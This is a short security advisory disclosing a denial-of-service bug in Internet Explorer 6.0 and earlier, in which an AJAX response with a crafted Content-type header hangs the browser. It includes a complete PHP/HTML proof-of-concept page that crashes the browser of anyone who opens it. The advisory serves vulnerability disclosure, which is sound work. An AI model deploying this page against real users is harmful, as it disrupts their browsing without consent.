Internet Explorer AJAX Bug
Summary:
Internet Explorer 6.0 and below hangs when entering prepared page
Details:
When using AJAX (Asynchronous JavaScript and XML) to load page content
dynamicly we are allowed to do anything on the side of server. Internet
Explorer process hangs when Content-type header is sent within.
Vulnerable Versions:
Internet Explorer 6.0 and below, tested on Windows XP, 2000 and 2003.
Patches/Workarounds:
Unknown.
Exploits:
Execute the following PHP script in IE to cause it's process to die.
<?php
if (@$_SERVER['QUERY_STRING'] == 'ajax') {
/**
Sending this header causes Internet Explorer to hang.
*/
header('Content-type: text/html; encoding=utf-8');
echo "\n";
exit;
}
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="pl" lang="pl">
<head>
<title></title>
<script type="text/javascript">
function pageLoad() {
xmlHttp = false;
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
xmlHttp = false;
}
}
if (!xmlHttp && typeof XMLHttpRequest != 'undefined')
xmlHttp = new XMLHttpRequest();
if (!xmlHttp)
return;
xmlHttp.open("GET", "?ajax", true);
xmlHttp.send(null);
}
</script>
</head>
<body onload="pageLoad()">
</body>
</html>
Discovered by
Łukasz Lach
anakin[at]php5[dot]pl